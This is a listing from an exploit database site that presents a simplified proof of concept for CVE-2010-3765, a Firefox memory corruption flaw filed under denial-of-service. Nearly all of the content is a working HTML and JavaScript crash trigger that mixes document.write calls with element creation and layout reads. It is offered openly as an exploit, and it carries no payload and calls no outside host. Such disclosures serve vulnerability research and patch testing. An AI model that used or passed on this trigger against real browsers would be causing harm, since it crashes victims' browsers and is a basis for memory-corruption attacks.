[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Firefox Memory Corruption Proof of Concept (Simplified)

Author
n/a
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14638
Category
dos / poc
Date add
29-10-2010
Platform
windows
=======================================================
Firefox Memory Corruption Proof of Concept (Simplified)
=======================================================

For those who still do not know .. The proof of concept (that I have
extracted) for CVE-2010-3765 is the following:
 
<html><body>
<script>
 
  function G(str){
    var cobj=document.createElement(str);
    document.body.appendChild(cobj);
    cobj.scrollWidth;
  }
 
  function crashme() {
    document.write("fooFOO");
    G("a");
    document.write("<a lang></a>a");
    G("base");
    document.write("barBAR");
    G("audio");
  }
</script>
<script>crashme();</script>
</body>
</html>
 


#  0day.today [2024-12-23]  #